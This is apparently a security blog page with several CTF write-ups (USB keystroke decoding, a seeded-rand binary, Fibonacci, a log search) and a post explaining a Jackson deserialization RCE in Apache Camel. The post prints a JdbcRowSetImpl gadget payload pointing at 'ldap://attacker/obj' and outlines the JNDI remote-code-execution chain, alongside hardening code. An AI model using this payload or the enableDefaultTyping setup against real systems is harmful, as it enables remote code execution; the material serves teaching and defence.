Solution to nc3 Klikkety Klack

18/12/17 — capitol

acab

name:

Klikkety Klack

category:

various

points:

n/a

Writeup

The Danish police are running a CTF in order to show the kids that they are cool; it is here.

We got a pcapng file that seems to contain communication between a USB keyboard (HP Basic USB Keyboard KU-0316) and a computer.

Some simple awk and Python did the trick. First, extract byte number three of each USB capture data record (the first keycode byte of a HID boot-protocol keyboard report) like this:

tshark -r /tmp/2.pcapng -T fields -e usb.capdata|awk -F':' '{print($3)}'|awk 'NF > 0' > data.txt

and then translate it to characters with this Python program:

# HID usage IDs (the keycode byte) mapped to characters, US layout, unshifted
mappings = {
        0x04:"A",
        0x05:"B",
        0x06:"C",
        0x07:"D",
        0x08:"E",
        0x09:"F",
        0x0A:"G",
        0x0B:"H",
        0x0C:"I",
        0x0D:"J",
        0x0E:"K",
        0x0F:"L",
        0x10:"M",
        0x11:"N",
        0x12:"O",
        0x13:"P",
        0x14:"Q",
        0x15:"R",
        0x16:"S",
        0x17:"T",
        0x18:"U",
        0x19:"V",
        0x1A:"W",
        0x1B:"X",
        0x1C:"Y",
        0x1D:"Z",
        0x1E:"1",
        0x1F:"2",
        0x20:"3",
        0x21:"4",
        0x22:"5",
        0x23:"6",
        0x24:"7",
        0x25:"8",
        0x26:"9",
        0x27:"0",
        0x28:"\n",
        0x2C:" ",
        0x2D:"-",
        0x2E:"=",
        0x2F:"[",
        0x30:"]"
        }

# one hex byte per line, as produced by the tshark/awk pipeline above
nums = []
with open('data.txt') as keys:
        for line in keys:
                nums.append(int(line.strip(), 16))

output = ""
for n in nums:
        if n in mappings:
                output += mappings[n]
        else:
                output += 'x'   # key-release reports (0x00) and unmapped keys show up as x

print('output: ' + output)

That gave us the output:

output: xJxxEEGx xHxAARR xLxIIGGEx xTTEESSTxEETx xMxIINx xTxOxAxSxTTEERxMxAxLLWWAxRREx 
xOxGx xIINNGGEENN xAxNxTxIxVxIIRxUUSx xDxExTTExCxTxEERRExDxEx xDDExNxx1xx xxFxxExDxTx 
xMxAxNxxx xxDxxExNx xHxAARx xSxHxAxxx2x556x 
x4x2xCx3xDx3xBxAx5xCx0x9x9x1x0x6xFxCx2x1xAxBx5x3x9x0x8x4x9x5xDx5xExFx2xFxFx9xFxCxAxAx8x9x0xBx1xCx7xExFx4x3x8x6xBxCx0x8x9x3xFx2xFxxxxxxxFx2xFx
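The x characters and doubled letters above come from treating only one byte of each report as a character. As an added example (not the writeup's script), here is a decoder in Java that reads the whole 8-byte HID boot-protocol report, so it can apply the shift modifier, ignore the key-release reports, and emit each key once even when it is repeated across consecutive reports while held. It assumes a US keyboard layout, accepts usb.capdata either colon-separated (as the awk pipeline above expects) or as plain hex (as newer tshark prints it), and runs on a constructed sample instead of data.txt; the class and method names are chosen here.

```java
import java.util.Arrays;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;

public class HidKeyDecoder {

    // HID usage id -> {unshifted, shifted}, US layout; covers the keys in the writeup's table
    private static final Map<Integer, String[]> KEYMAP = new HashMap<>();
    static {
        for (int i = 0; i < 26; i++) {
            char c = (char) ('a' + i);
            KEYMAP.put(0x04 + i, new String[] { String.valueOf(c),
                                                 String.valueOf(Character.toUpperCase(c)) });
        }
        String digits = "1234567890", shifted = "!@#$%^&*()";
        for (int i = 0; i < 10; i++) {
            KEYMAP.put(0x1E + i, new String[] { digits.substring(i, i + 1),
                                                 shifted.substring(i, i + 1) });
        }
        KEYMAP.put(0x28, new String[] { "\n", "\n" });
        KEYMAP.put(0x2C, new String[] { " ", " " });
        KEYMAP.put(0x2D, new String[] { "-", "_" });
        KEYMAP.put(0x2E, new String[] { "=", "+" });
        KEYMAP.put(0x2F, new String[] { "[", "{" });
        KEYMAP.put(0x30, new String[] { "]", "}" });
    }

    // byte 0 of a boot-protocol report is the modifier bitmap: left shift 0x02, right shift 0x20
    private static final int SHIFT_MASK = 0x22;

    /** Parses one usb.capdata value ("00:00:04:00:..." or "0000040000...") into report bytes. */
    static int[] parseReport(String line) {
        String hex = line.trim().replace(":", "");
        if (hex.length() < 16 || hex.length() % 2 != 0) {
            return null;                         // not a complete 8-byte boot report
        }
        int[] bytes = new int[hex.length() / 2];
        try {
            for (int i = 0; i < bytes.length; i++) {
                bytes[i] = Integer.parseInt(hex.substring(2 * i, 2 * i + 2), 16);
            }
        } catch (NumberFormatException e) {
            return null;                         // junk line, skip it
        }
        return bytes;
    }

    /** Decodes a sequence of reports into text, emitting a character only on a new key press. */
    static String decode(List<String> lines) {
        StringBuilder out = new StringBuilder();
        Set<Integer> held = new HashSet<>();     // keys down in the previous report
        for (String line : lines) {
            int[] rep = parseReport(line);
            if (rep == null) {
                continue;
            }
            boolean shift = (rep[0] & SHIFT_MASK) != 0;
            Set<Integer> now = new HashSet<>();
            for (int i = 2; i < 8; i++) {        // bytes 2..7: up to six simultaneous keycodes
                int key = rep[i];
                if (key == 0) {
                    continue;                    // empty slot (a release report is all zeros)
                }
                now.add(key);
                if (held.contains(key)) {
                    continue;                    // still down since the last report: not a new press
                }
                String[] chars = KEYMAP.get(key);
                out.append(chars == null ? "?" : chars[shift ? 1 : 0]);
            }
            held = now;
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Constructed sample: Shift+h reported twice while held, then i, -, 5, Enter, and an
        // 'a' report in the colon-less format.
        List<String> sample = Arrays.asList(
            "02:00:0b:00:00:00:00:00",
            "02:00:0b:00:00:00:00:00",
            "00:00:00:00:00:00:00:00",
            "00:00:0c:00:00:00:00:00",
            "00:00:00:00:00:00:00:00",
            "00:00:2d:00:00:00:00:00",
            "00:00:00:00:00:00:00:00",
            "00:00:22:00:00:00:00:00",
            "00:00:00:00:00:00:00:00",
            "00:00:28:00:00:00:00:00",
            "00:00:00:00:00:00:00:00",
            "0000040000000000");
        System.out.print(decode(sample));        // prints "Hi-5" on one line and "a" on the next
    }
}
```

Feed it the output of tshark -r capture.pcapng -T fields -e usb.capdata, one report per line, instead of the sample list. Because a real capture also contains reports from the host side and from other endpoints, filtering on the keyboard's interrupt-in endpoint in tshark first keeps the input to actual keystroke reports.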

Checking the hash 42C3D3BA5C099106FC21AB53908495D5EF2FF9FCAA890B1C7EF4386BC0893F2F on virustotal.com we found this comment:

This evil malware that infected my toaster made a call to 45.63.119.180 on port 9999 and sent the text "HELLO". I think that server is a C2-server.

Connecting to that IP and port gave us another link, from which we could download a binary.

Running strings on that binary gave us something that looked like a URL:

nc3ctffqH
qn5ozfjyH
.onion/

and the string: 23/09/90 kl. 01:12:12 UTC er det helt rigtige unix-tidspunkt til at skabe en URL (Danish for "23/09/90 at 01:12:12 UTC is exactly the right Unix timestamp for creating a URL").

After decompiling the binary, the important part was this:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax@1
  int v4; // ST0C_4@1
  int result; // eax@1
  __int64 v6; // rsi@1
  __int64 v7; // [sp+10h] [bp-70h]@1
  __int64 v8; // [sp+18h] [bp-68h]@1
  __int64 v9; // [sp+20h] [bp-60h]@1
  char v10; // [sp+28h] [bp-58h]@1
  __int16 v11; // [sp+68h] [bp-18h]@1
  __int64 v12; // [sp+78h] [bp-8h]@1

  v12 = *MK_FP(__FS__, 40LL);
  v3 = time(0LL);
  srand(v3);
  v4 = rand();
  v7 = 8171331223976895342LL;
  v8 = 8748917902158425713LL;
  v9 = 13350748694671150LL;
  memset(&v10, 0, 0x40uLL);
  v11 = 0;
  puts("23/09/90 kl. 01:12:12 UTC er det helt rigtige unix-tidspunkt til at skabe en URL");
  printf("%s%d\n", &v7, (unsigned int)v4);
  result = 0;
  v6 = *MK_FP(__FS__, 40LL) ^ v12;
  return result;
}

We changed the srand seed from time(0) to the Unix epoch of the date in that string, and got the URL.
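The two facts that solution rests on, as an added Java example (not from the writeup or the challenge binary): the three immediates stored at v7, v8 and v9 are the URL prefix laid out as consecutive little-endian qwords, and the seed is simply the Unix timestamp named in the binary's own message. Class and method names are chosen here. The numeric suffix is whatever the C library's rand() returns after srand() with that seed, which is why the writeup patches the binary rather than reimplementing it.

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.charset.StandardCharsets;
import java.time.LocalDateTime;
import java.time.ZoneOffset;

public class SeedRecovery {

    // The three 64-bit immediates the decompiler showed being stored at v7, v8 and v9.
    static final long[] IMMEDIATES = {
        8171331223976895342L, 8748917902158425713L, 13350748694671150L
    };

    /** Reassembles a stack string from consecutive little-endian qword stores. */
    static String stackString(long[] words) {
        ByteBuffer buf = ByteBuffer.allocate(8 * words.length).order(ByteOrder.LITTLE_ENDIAN);
        for (long w : words) {
            buf.putLong(w);
        }
        byte[] b = buf.array();
        int len = 0;
        while (len < b.length && b[len] != 0) {
            len++;                                   // printf("%s", &v7) stops at the first NUL
        }
        return new String(b, 0, len, StandardCharsets.US_ASCII);
    }

    /** The seed the binary uses if it runs at the moment named in its own message. */
    static long seedFromMessage() {
        // 23/09/90 kl. 01:12:12 UTC, read as dd/mm/yy like the rest of the Danish text
        return LocalDateTime.of(1990, 9, 23, 1, 12, 12).toEpochSecond(ZoneOffset.UTC);
    }

    public static void main(String[] args) {
        System.out.println(stackString(IMMEDIATES));   // nc3ctffqqn5ozfjy.onion/
        System.out.println(seedFromMessage());         // 654052332
    }
}
```

Seeding rand() with time() is deterministic for anyone who knows, or can guess, the time, which is the property the challenge turns into a puzzle and the reason such a generator must never be used to derive anything meant to stay unpredictable.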

That gave us the flag:

DO_IT_FOR_THIS_ADORABLE_LITTLE_PUPPY_LOOK_AT_THE_PUPPY_MARGE

Jackson deserialization exploits

15/12/17 — capitol

serialize

Earlier this year a remote code execution exploit was published against Apache Camel. Let's look at how that vulnerability works and how to guard against it.

First some background: Apache Camel is a framework that helps with building integrations between different components in a system. You can, for example, read from a JMS queue and write to an HTTPS endpoint. Very enterprise.

The exploitable part was in the Jackson library that Camel used to serialize and deserialize.

The vulnerability in Jackson can be demonstrated with just a few lines of Java code:

    import com.fasterxml.jackson.databind.ObjectMapper;
    import java.util.List;

    // Deliberately vulnerable: the JSON itself names the class to instantiate and the
    // property (autoCommit) whose setter triggers the JNDI lookup of dataSourceName.
    String json = "[\"java.util.List\", [[\"com.sun.rowset.JdbcRowSetImpl\" ,{\n" +
            "\"dataSourceName\":\n" +
            "\"ldap://attacker/obj\" ,\n" +
            "\"autoCommit\" : true\n" +
            "}]]]";

    ObjectMapper om = new ObjectMapper();
    om.enableDefaultTyping();   // lets the sender choose the Java class: this is the dangerous setting
    Object o = om.readValue(json, List.class);

Running it gives the error:

Exception in thread "main" com.fasterxml.jackson.databind.JsonMappingException: JdbcRowSet (anslut) JNDI kan inte anslutas
 at [Source: ["java.util.List", [["com.sun.rowset.JdbcRowSetImpl" ,{
"dataSourceName":
"ldap://attacker/obj" ,
"autoCommit" : true
}]]]; line: 4, column: 16] (through reference chain: java.util.ArrayList[0]->com.sun.rowset.JdbcRowSetImpl["autoCommit"])
	at com.fasterxml.jackson.databind.JsonMappingException.from(JsonMappingException.java:223)
	at com.fasterxml.jackson.databind.deser.SettableBeanProperty._throwAsIOE(SettableBeanProperty.java:537)
	at com.fasterxml.jackson.databind.deser.SettableBeanProperty._throwAsIOE(SettableBeanProperty.java:518)
	at com.fasterxml.jackson.databind.deser.impl.MethodProperty.deserializeAndSet(MethodProperty.java:99)
	at com.fasterxml.jackson.databind.deser.BeanDeserializer.vanillaDeserialize(BeanDeserializer.java:260)
	at com.fasterxml.jackson.databind.deser.BeanDeserializer.deserialize(BeanDeserializer.java:125)
	at com.fasterxml.jackson.databind.jsontype.impl.AsArrayTypeDeserializer._deserialize(AsArrayTypeDeserializer.java:110)
	at com.fasterxml.jackson.databind.jsontype.impl.AsArrayTypeDeserializer.deserializeTypedFromAny(AsArrayTypeDeserializer.java:68)
	at com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla.deserializeWithType(UntypedObjectDeserializer.java:554)
	at com.fasterxml.jackson.databind.deser.std.CollectionDeserializer.deserialize(CollectionDeserializer.java:279)
	at com.fasterxml.jackson.databind.deser.std.CollectionDeserializer.deserialize(CollectionDeserializer.java:249)
	at com.fasterxml.jackson.databind.deser.std.CollectionDeserializer.deserialize(CollectionDeserializer.java:26)
	at com.fasterxml.jackson.databind.jsontype.impl.AsArrayTypeDeserializer._deserialize(AsArrayTypeDeserializer.java:110)
	at com.fasterxml.jackson.databind.jsontype.impl.AsArrayTypeDeserializer.deserializeTypedFromArray(AsArrayTypeDeserializer.java:50)
	at com.fasterxml.jackson.databind.deser.std.CollectionDeserializer.deserializeWithType(CollectionDeserializer.java:310)
	at com.fasterxml.jackson.databind.deser.impl.TypeWrappedDeserializer.deserialize(TypeWrappedDeserializer.java:42)
	at com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:3788)
	at com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:2779)
	at no.hackeriet.App.main(App.java:23)
Caused by: java.sql.SQLException: JdbcRowSet (anslut) JNDI kan inte anslutas
	at com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634)
	at com.sun.rowset.JdbcRowSetImpl.setAutoCommit(JdbcRowSetImpl.java:4067)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at com.fasterxml.jackson.databind.deser.impl.MethodProperty.deserializeAndSet(MethodProperty.java:97)
	... 15 more

There is a type check in the readValue call, but it doesn't stop the attack: it only checks that what we deserialize is a List, and the contents of the list aren't type checked because of type erasure.

Jackson lets the sender specify which Java classes the JSON gets deserialized into because of the call om.enableDefaultTyping(). The same behaviour is also triggered if you have annotated a java.lang.Object property with @JsonTypeInfo.

If your code does neither, you are safe from this attack.
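When polymorphic deserialization is genuinely needed, the type ids the sender supplies have to be restricted to the hierarchy the application expects. The following is an added example, not code from the post or from the Jackson project; it assumes Jackson 2.10 or later, where enableDefaultTyping() was replaced by activateDefaultTyping(), which refuses to run without a PolymorphicTypeValidator. The Event and LoginEvent classes and the com.example.events package are hypothetical.

```java
package com.example.events;

import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;
import java.io.IOException;
import java.util.List;

public class SafeTyping {

    // Hypothetical application types: the only hierarchy whose subtypes the JSON may name.
    public abstract static class Event { public String source; }
    public static class LoginEvent extends Event { public String user; }

    /** Mapper that honours class-name type ids only under our own Event base type. */
    public static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfBaseType(Event.class)   // every other base type (Object, List, ...) is denied
                .build();
        ObjectMapper om = new ObjectMapper();
        // Jackson 2.10+: replaces enableDefaultTyping() and requires a validator.
        om.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return om;
    }

    /** True when the mapper rejects the document; nothing named in it gets instantiated. */
    public static boolean rejects(ObjectMapper om, String json, Class<?> target) {
        try {
            om.readValue(json, target);
            return false;
        } catch (JsonMappingException e) {     // an InvalidTypeIdException in practice
            return true;
        } catch (IOException e) {              // malformed JSON: not the case under test
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) throws IOException {
        ObjectMapper om = hardenedMapper();

        // Constructed legitimate document: the type id names one of our own subtypes.
        String ok = "[\"com.example.events.SafeTyping$LoginEvent\","
                + "{\"source\":\"web\",\"user\":\"alice\"}]";
        Event e = om.readValue(ok, Event.class);
        System.out.println("accepted: " + e.getClass().getSimpleName());   // LoginEvent

        // The post's payload aimed at the erased List<Object> target: denied already at
        // "java.util.List", before the inner JdbcRowSetImpl type id is looked at.
        String hostile = "[\"java.util.List\", [[\"com.sun.rowset.JdbcRowSetImpl\" ,{"
                + "\"dataSourceName\": \"ldap://attacker/obj\", \"autoCommit\" : true}]]]";
        System.out.println("hostile via List: " + rejects(om, hostile, List.class));      // true

        // The same gadget named under the allowed base type fails the is-a-subtype check
        // instead; its setters never run because no instance is created.
        String wrongSubtype = "[\"com.sun.rowset.JdbcRowSetImpl\", {\"autoCommit\": true}]";
        System.out.println("hostile via Event: " + rejects(om, wrongSubtype, Event.class)); // true
    }
}
```

On the Jackson versions current when this was written there is no validator, so the only robust defence is to leave default typing off and deserialize into concrete application types (readValue(json, Order.class)) rather than Object or raw List; the blacklist of known gadgets in newer releases is a backstop, not a substitute for that.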

Gadgets

The classes that can be used to escalate a deserialization into remote code execution are called gadgets.

More modern versions of Jackson have a blacklist of known dangerous classes that they refuse to deserialize; see here.

But there is a large number of Java classes out there and it's impossible to blacklist all of them.

For a class to be a valid gadget for a Jackson deserialization attack, these criteria need to be fulfilled:

  • A default constructor, i.e. a constructor without any arguments.
  • A method, called during deserialization, that acts on its argument in a non-trivial way. The simplest case is being able to provide a serialized Java class with a function that gets called, but there are a number of other ways, for example via JNDI connections.

The LDAP gadget

For those who aren't that deep into the Java world, a quick description of JNDI: JNDI does for LDAP what JDBC does for a database; in other words, it provides an interface for interacting with an LDAP server from Java.

How the LDAP URL leads to remote code execution is a bit out of scope, but it is described here.

To summarize, the attack has these steps:

  1. Attacker provides an absolute LDAP URL to a vulnerable JNDI lookup method.
  2. Target connects to an attacker-controlled LDAP server that returns a malicious JNDI Reference.
  3. Target decodes the JNDI Reference.
  4. Target fetches the Factory class from the attacker-controlled server.
  5. Target instantiates the Factory class.
  6. Payload gets executed.

Solution to SECCON 2017 putchar Music

13/12/17 — capitol

rebels

name:

putchar music

category:

programming

points:

100

Writeup

We got a one-liner C program and were asked to find the movie title. After adding include lines it looked like this:

#include <stdio.h>
#include <math.h>

int main(void)
{
    /* each byte encodes one note: p[i]/6 selects the pitch, p[i]%6 the duration */
    unsigned char p[] = "###<f_YM\204g_YM\204g_Y_H #<f_YM\204g_YM\204g_Y_H #+-?[WKAMYJ/7 #+-?[WKgH #+-?[WKAMYJ/7hk\206\203tk\\YJAfkkk";
    int t, i, j;

    /* cycles through the tune forever; the condition t = 1 resets the sample counter per note */
    for (i = 0; t = 1; i = (i + 1) % (sizeof(p) - 1)) {
        /* 1.0594630943... is the twelfth root of two, so x scales the pitch in semitones */
        double x = pow(1.05946309435931, p[i] / 6 + 13);
        /* emit about 8192/j samples of a crude waveform; a larger j gives a shorter note */
        for (j = 1 + p[i] % 6; t++ % (8192 / j); )
            putchar(t >> 5 | (int)(t * x));
    }
}

We compiled it with:

gcc putchar.c -lm

When we ran the program it produced a lot of random-looking output at intervals, so we piped it to the sound card with:

./a.out | padsp tee /dev/audio > /dev/null

That produced beautiful music and we are thinking about converting all our mp3s to C now.

flag was SECCON{STAR_WARS}

Solution to SECCON 2017 Run Me!

12/12/17 — capitol

fibonacci

name:

Run Me!

category:

programming

points:

100

Writeup

We got a small python program that calculated a number and printed the flag.

import sys
sys.setrecursionlimit(99999)
# naive recursive Fibonacci, f(0) = 0 and f(1) = 1: exponential time in n
def f(n):
    return n if n < 2 else f(n-2) + f(n-1)
print("SECCON{" + str(f(11011))[:32] + "}")

The only problem was that it was pretty slow. Looking at the function f, it became clear that it was a recursive implementation of a Fibonacci number calculator.

We can simplify the program by pre-calculating the number, since the input 11011 is static. This is a good resource for doing math online. That gives us the program:

print("SECCON{" + str(650761408323317176677727615418728824035834139276098998490249192132666758545760517800054917034155243927170284032856159641073239445267259027201529090078896791094491606651280986273375358475762477790432186275595009347181655230560612893072010176744437899125794062096822499169737341076562268978822309439778493884517811269755645677051823939101818750862488649336629337157213652909313926271909722579127327516034001078889493903847162940951919936666981110589496109534874704781719109928400031417346568159901873387957504386076864598280589140560720555215586103334108606666557885182543411057646507987554088958465040914897691939542285281414546306123632401776970176802858533764858159120251846344138169520194579452006975065591700295752709436626337896977143749517364692359205470520308998499747373023079909096931930849470838600436193492730120598058390332468715098569506803288748815104425904241644846838395455904535450056833234799685571736399955768131656445051569947468596781842534517197721000873495062895837282533156293369623617362342118583768869069357254102738089664559884034222599617271201387495056590015984399482556187470258510628428546129648977633092532344658489593547730850249245718744514953339799649429008307017831938762015220771469692523759803441301822573457181350382636976785308875676049259482221646051841764952498511738390807032009076345712915067307334601511409483180854512241289677598260345859220604188459466566218428522712526307485414327912984814200699366287893779866533195964875622418194229718474283906639970274067803465246049255487228512317014925146357266424154230175016287402954010234339299976926358623916935423402962510413409907048690682619724213875769975891654986212343055742766929242325603302953851160284942626779251037312496874310855130377517889541404945838665610608950717555040757378177019719117615549280661866187332498803134726445107694994290546795927294081948416543673731399120512192375688817905543314233147723782998209741461558386215456190659067634677870007289790910629423072714321397319111715970130151174669992797276293445539760861617336440030158167771970869191088140343413881822920781894388333124029339099939263144538805634147654202831717365638267529461536461367917300661565377015525846611173849663494461429041123993952629470445363197932541803303152120627201578910609457626560492171665716942761589)[:32] + "}")
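Pasting a 2300-digit literal works, but the number is just as quick to compute once the exponential recursion is replaced by a linear loop over big integers. The Java program below is an added example, not the challenge's or the author's code; fib and flag are names chosen here, and it reproduces the same first 32 digits as the literal above.

```java
import java.math.BigInteger;

public class FastFib {

    /**
     * Iterative Fibonacci with the same convention as the challenge's f:
     * fib(0) = 0, fib(1) = 1. Linear in n instead of exponential, since each
     * value is computed exactly once.
     */
    static BigInteger fib(int n) {
        if (n < 0) {
            throw new IllegalArgumentException("n must be non-negative");
        }
        BigInteger a = BigInteger.ZERO;   // fib(i)
        BigInteger b = BigInteger.ONE;    // fib(i + 1)
        for (int i = 0; i < n; i++) {
            BigInteger next = a.add(b);
            a = b;
            b = next;
        }
        return a;
    }

    /** Same formatting as the challenge script: the first 32 decimal digits. */
    static String flag(int n) {
        String digits = fib(n).toString();
        return "SECCON{" + digits.substring(0, Math.min(32, digits.length())) + "}";
    }

    public static void main(String[] args) {
        System.out.println(flag(11011));   // SECCON{65076140832331717667772761541872}
    }
}
```

For much larger n the fast-doubling identities fib(2k) = fib(k)(2 fib(k+1) - fib(k)) and fib(2k+1) = fib(k)^2 + fib(k+1)^2 bring the addition count down to O(log n), but 11011 iterations of BigInteger.add finish in milliseconds, so the simple loop is enough here.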

flag was SECCON{65076140832331717667772761541872}

Solution to SECCON 2017 Log Search

11/12/17 — capitol

logs

name:

Log search

category:

web

points:

100

Writeup

We got a link to an empty site with the words "Find the flag!".

Looking at the source we found a link to another page.

That was a search page for accesses to the website. Searching for flag gave us this URL: http://logsearch.pwn.seccon.jp/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt

flag was SECCON{N0SQL_1njection_for_Elasticsearch!}